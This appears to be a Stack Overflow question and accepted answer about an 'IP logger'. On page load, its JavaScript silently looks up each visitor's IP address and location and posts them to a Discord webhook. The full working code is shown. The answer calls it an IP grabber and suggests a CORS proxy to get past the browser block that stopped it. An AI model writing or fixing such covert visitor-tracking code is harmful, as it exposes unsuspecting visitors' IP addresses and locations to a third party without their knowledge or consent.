# Send website visitor IP when accessing website

Tags: javascript, html, jquery, discord, ip

I am working on a personal project and I was wondering why not use a kind of ip logger that logs the ip of a visitor and sends it to a Discord webhook.
The code works, but only locally. I tried hosting the code on Glitch but i was getting this error in the console:

```
(site) deleted for privacy/:1 Access to XMLHttpRequest at 'https://discord.com/api/webhooks/(deleted for privacy)' from origin '(site) deleted for privacy' has been blocked by CORS policy: Response to preflight request doesn't pass access control check: No 'Access-Control-Allow-Origin' header is present on the requested resource.
discord.com/api/webhooks/(deleted for privacy) Failed to load resource: net::ERR_FAILED
```

grab.js:

```
$.getJSON("https://ipgeolocation.abstractapi.com/v1/?api_key=(my api key)", function(data) { //Make sure to use this api or use another but you got to change the values down below
    var request = new XMLHttpRequest();
    request.open("POST", "https://discord.com/api/webhooks/(the webhook)");
  
    request.setRequestHeader('Content-type', 'application/json');
    var t = {
      username: "gameJet posta",
      avatar_url: "https://www.origo.hu/i/1305/20130509-fogonosz-semion-mogilevich-orosz-maffiozo.jpg",
      content: "",
      embeds: [{
          color: "4700374",
          title: "szia lajos",
          fields: [
            {name: "Ip cim a latogatonak", value: data.ip_address},
            {name: "varos", value: data.city},
            {name: "orszag", value: data.country},
            {name: "CONTINENT(nem tudom magyarul)", value: data.continent},
          ],
         
      }]
  };
  
    request.send(JSON.stringify(t));
})
```

index.html:

```
<!DOCTYPE html>
<html lang="en">
<head>
    <meta charset="UTF-8">
    <meta http-equiv="X-UA-Compatible" content="IE=edge">
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
    <title>Document</title>
    <script src="https://cdnjs.cloudflare.com/ajax/libs/jquery/2.2.4/jquery.min.js"></script> <!--- Keep or else the script won't work --->
</head>
<body>
    <script src="grab.js"></script>
    <h1>Hello World</h1>
</body>
</html>
```

Answer (score 1, accepted):

[This answer](https://stackoverflow.com/questions/43871637/no-access-control-allow-origin-header-is-present-on-the-requested-resource-whe/43881141#43881141) covers most of the grounds of your error, to just be short I would like to diagnose your error for you and tell you this:

"No Access-Control-Allow-Origin header" problems ply through the [CORS Policy](https://developer.mozilla.org/en-US/docs/Web/HTTP/CORS) as it considers your script malicious ( since it obviously is an IP grabber ) you can work your where around this via a CORS proxy which you can set up with the linked answer above.

Also [Chromium does not allow CORS on localhost](https://bugs.chromium.org/p/chromium/issues/detail?id=67743) that's why you weren't facing the issue there.

Comment: Thank you so much, however i am a bit busy now and might not be able to implement the fix but the thing looks like it fulfills my needs.

Comment:  no issues feel free to create a new question if you encounter any other errors